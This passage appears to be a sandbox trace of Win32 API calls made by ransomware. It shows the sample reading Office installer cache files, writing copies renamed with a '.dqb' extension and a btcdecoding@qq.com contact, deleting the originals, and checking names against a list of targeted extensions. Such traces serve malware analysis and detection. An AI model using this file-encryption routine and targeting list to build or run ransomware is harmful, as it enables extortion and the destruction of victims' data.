lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.244] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.245] GetLastError () returned 0x0 [0035.245] ReadFile (in: hFile=0x188, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x333, lpOverlapped=0x0) returned 1 [0035.295] WriteFile (in: hFile=0x1a0, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x340, lpOverlapped=0x0) returned 1 [0035.296] ReadFile (in: hFile=0x188, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.296] WriteFile (in: hFile=0x1a0, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0035.296] SetEndOfFile (hFile=0x1a0) returned 1 [0035.296] CloseHandle (hObject=0x1a0) returned 1 [0035.297] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.297] SetEndOfFile (hFile=0x188) returned 1 [0035.297] CloseHandle (hObject=0x188) returned 1 [0035.298] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0035.298] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml")) returned 1 [0035.298] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0035.298] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0035.298] lstrlenW (lpString=".doc") returned 4 [0035.298] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.298] lstrlenW (lpString=".docx") returned 5 [0035.298] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0035.298] lstrlenW (lpString=".pdf") returned 4 [0035.298] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.298] lstrlenW (lpString=".xls") returned 4 [0035.298] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.298] lstrlenW (lpString=".xlsx") returned 5 [0035.298] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0035.298] lstrlenW (lpString=".ppt") returned 4 [0035.298] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.298] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0035.298] lstrlenW (lpString=".zip") returned 4 [0035.299] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.299] lstrlenW (lpString=".rar") returned 4 [0035.299] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.299] lstrlenW (lpString=".bz2") returned 4 [0035.299] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.299] lstrlenW (lpString=".7z") returned 3 [0035.299] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.299] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0035.299] lstrlenW (lpString=".dbf") returned 4 [0035.299] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.299] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0035.299] lstrlenW (lpString=".1cd") returned 4 [0035.299] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.299] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0035.299] lstrlenW (lpString=".jpg") returned 4 [0035.299] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.299] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0035.299] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0035.299] lstrlenW (lpString=".doc") returned 4 [0035.299] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.299] lstrlenW (lpString=".docx") returned 5 [0035.299] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0035.299] lstrlenW (lpString=".pdf") returned 4 [0035.299] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.299] lstrlenW (lpString=".xls") returned 4 [0035.299] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.299] lstrlenW (lpString=".xlsx") returned 5 [0035.299] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0035.299] lstrlenW (lpString=".ppt") returned 4 [0035.299] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.299] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0035.299] lstrlenW (lpString=".zip") returned 4 [0035.299] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.299] lstrlenW (lpString=".rar") returned 4 [0035.299] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.299] lstrlenW (lpString=".bz2") returned 4 [0035.300] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.300] lstrlenW (lpString=".7z") returned 3 [0035.300] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.300] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0035.300] lstrlenW (lpString=".dbf") returned 4 [0035.300] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.300] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0035.300] lstrlenW (lpString=".1cd") returned 4 [0035.300] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.300] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 79 [0035.300] lstrlenW (lpString=".jpg") returned 4 [0035.300] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.300] lstrcmpiW (lpString1=".chm", lpString2=".dqb") returned -1 [0035.300] lstrlenW (lpString="setup.chm") returned 9 [0035.300] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0035.300] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=67190) returned 1 [0035.300] CloseHandle (hObject=0x188) returned 1 [0035.300] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm")) returned 0x2020 [0035.300] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0035.301] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0035.301] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.301] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.301] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.301] GetLastError () returned 0x0 [0035.301] ReadFile (in: hFile=0x188, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x10676, lpOverlapped=0x0) returned 1 [0035.304] WriteFile (in: hFile=0x1a0, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x10680, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x10680, lpOverlapped=0x0) returned 1 [0035.306] ReadFile (in: hFile=0x188, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.306] WriteFile (in: hFile=0x1a0, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.306] SetEndOfFile (hFile=0x1a0) returned 1 [0035.306] CloseHandle (hObject=0x1a0) returned 1 [0035.307] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.307] SetEndOfFile (hFile=0x188) returned 1 [0035.308] CloseHandle (hObject=0x188) returned 1 [0035.308] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0035.308] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm")) returned 1 [0035.309] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0035.309] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0035.309] lstrlenW (lpString=".doc") returned 4 [0035.309] lstrcmpiW (lpString1=".doc", lpString2=".chm") returned 1 [0035.309] lstrlenW (lpString=".docx") returned 5 [0035.309] lstrcmpiW (lpString1=".docx", lpString2="p.chm") returned -1 [0035.309] lstrlenW (lpString=".pdf") returned 4 [0035.309] lstrcmpiW (lpString1=".pdf", lpString2=".chm") returned 1 [0035.309] lstrlenW (lpString=".xls") returned 4 [0035.309] lstrcmpiW (lpString1=".xls", lpString2=".chm") returned 1 [0035.309] lstrlenW (lpString=".xlsx") returned 5 [0035.309] lstrcmpiW (lpString1=".xlsx", lpString2="p.chm") returned -1 [0035.309] lstrlenW (lpString=".ppt") returned 4 [0035.309] lstrcmpiW (lpString1=".ppt", lpString2=".chm") returned 1 [0035.309] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0035.309] lstrlenW (lpString=".zip") returned 4 [0035.309] lstrcmpiW (lpString1=".zip", lpString2=".chm") returned 1 [0035.309] lstrlenW (lpString=".rar") returned 4 [0035.309] lstrcmpiW (lpString1=".rar", lpString2=".chm") returned 1 [0035.309] lstrlenW (lpString=".bz2") returned 4 [0035.309] lstrcmpiW (lpString1=".bz2", lpString2=".chm") returned -1 [0035.309] lstrlenW (lpString=".7z") returned 3 [0035.309] lstrcmpiW (lpString1=".7z", lpString2="chm") returned -1 [0035.309] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0035.309] lstrlenW (lpString=".dbf") returned 4 [0035.309] lstrcmpiW (lpString1=".dbf", lpString2=".chm") returned 1 [0035.309] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0035.309] lstrlenW (lpString=".1cd") returned 4 [0035.309] lstrcmpiW (lpString1=".1cd", lpString2=".chm") returned -1 [0035.310] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0035.310] lstrlenW (lpString=".jpg") returned 4 [0035.310] lstrcmpiW (lpString1=".jpg", lpString2=".chm") returned 1 [0035.310] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0035.310] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0035.310] lstrlenW (lpString=".doc") returned 4 [0035.310] lstrcmpiW (lpString1=".doc", lpString2=".chm") returned 1 [0035.310] lstrlenW (lpString=".docx") returned 5 [0035.310] lstrcmpiW (lpString1=".docx", lpString2="p.chm") returned -1 [0035.310] lstrlenW (lpString=".pdf") returned 4 [0035.310] lstrcmpiW (lpString1=".pdf", lpString2=".chm") returned 1 [0035.310] lstrlenW (lpString=".xls") returned 4 [0035.310] lstrcmpiW (lpString1=".xls", lpString2=".chm") returned 1 [0035.310] lstrlenW (lpString=".xlsx") returned 5 [0035.310] lstrcmpiW (lpString1=".xlsx", lpString2="p.chm") returned -1 [0035.310] lstrlenW (lpString=".ppt") returned 4 [0035.310] lstrcmpiW (lpString1=".ppt", lpString2=".chm") returned 1 [0035.310] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0035.310] lstrlenW (lpString=".zip") returned 4 [0035.310] lstrcmpiW (lpString1=".zip", lpString2=".chm") returned 1 [0035.310] lstrlenW (lpString=".rar") returned 4 [0035.310] lstrcmpiW (lpString1=".rar", lpString2=".chm") returned 1 [0035.310] lstrlenW (lpString=".bz2") returned 4 [0035.310] lstrcmpiW (lpString1=".bz2", lpString2=".chm") returned -1 [0035.310] lstrlenW (lpString=".7z") returned 3 [0035.310] lstrcmpiW (lpString1=".7z", lpString2="chm") returned -1 [0035.310] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0035.310] lstrlenW (lpString=".dbf") returned 4 [0035.311] lstrcmpiW (lpString1=".dbf", lpString2=".chm") returned 1 [0035.311] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0035.311] lstrlenW (lpString=".1cd") returned 4 [0035.311] lstrcmpiW (lpString1=".1cd", lpString2=".chm") returned -1 [0035.311] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0035.311] lstrlenW (lpString=".jpg") returned 4 [0035.311] lstrcmpiW (lpString1=".jpg", lpString2=".chm") returned 1 [0035.311] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0035.311] lstrlenW (lpString="Setup.xml") returned 9 [0035.311] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0035.311] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=9352) returned 1 [0035.311] CloseHandle (hObject=0x188) returned 1 [0035.311] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0035.311] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0035.311] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0035.311] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.312] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.312] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.312] GetLastError () returned 0x0 [0035.312] ReadFile (in: hFile=0x188, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x2488, lpOverlapped=0x0) returned 1 [0035.313] WriteFile (in: hFile=0x1a0, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x2490, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x2490, lpOverlapped=0x0) returned 1 [0035.314] ReadFile (in: hFile=0x188, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.314] WriteFile (in: hFile=0x1a0, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.314] SetEndOfFile (hFile=0x1a0) returned 1 [0035.315] CloseHandle (hObject=0x1a0) returned 1 [0035.315] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.315] SetEndOfFile (hFile=0x188) returned 1 [0035.316] CloseHandle (hObject=0x188) returned 1 [0035.316] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0035.316] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0035.316] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.317] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.317] lstrlenW (lpString=".doc") returned 4 [0035.317] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.317] lstrlenW (lpString=".docx") returned 5 [0035.317] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.317] lstrlenW (lpString=".pdf") returned 4 [0035.317] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.317] lstrlenW (lpString=".xls") returned 4 [0035.317] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.317] lstrlenW (lpString=".xlsx") returned 5 [0035.317] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.317] lstrlenW (lpString=".ppt") returned 4 [0035.317] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.317] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.317] lstrlenW (lpString=".zip") returned 4 [0035.317] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.317] lstrlenW (lpString=".rar") returned 4 [0035.317] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.317] lstrlenW (lpString=".bz2") returned 4 [0035.317] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.317] lstrlenW (lpString=".7z") returned 3 [0035.317] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.317] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.317] lstrlenW (lpString=".dbf") returned 4 [0035.317] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.317] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.317] lstrlenW (lpString=".1cd") returned 4 [0035.317] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.317] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.317] lstrlenW (lpString=".jpg") returned 4 [0035.317] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.317] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.317] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.318] lstrlenW (lpString=".doc") returned 4 [0035.318] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.318] lstrlenW (lpString=".docx") returned 5 [0035.318] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.318] lstrlenW (lpString=".pdf") returned 4 [0035.318] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.318] lstrlenW (lpString=".xls") returned 4 [0035.318] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.318] lstrlenW (lpString=".xlsx") returned 5 [0035.318] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.318] lstrlenW (lpString=".ppt") returned 4 [0035.318] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.318] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.318] lstrlenW (lpString=".zip") returned 4 [0035.318] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.318] lstrlenW (lpString=".rar") returned 4 [0035.318] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.318] lstrlenW (lpString=".bz2") returned 4 [0035.318] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.318] lstrlenW (lpString=".7z") returned 3 [0035.318] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.318] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.318] lstrlenW (lpString=".dbf") returned 4 [0035.318] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.318] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.318] lstrlenW (lpString=".1cd") returned 4 [0035.318] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.318] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.318] lstrlenW (lpString=".jpg") returned 4 [0035.318] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.318] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0035.318] lstrlenW (lpString="AccessMUI.xml") returned 13 [0035.319] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.850] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=1349) returned 1 [0035.850] CloseHandle (hObject=0x1a0) returned 1 [0035.851] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml")) returned 0x2020 [0035.851] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0035.851] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.851] SetFilePointerEx (in: hFile=0x1a0, 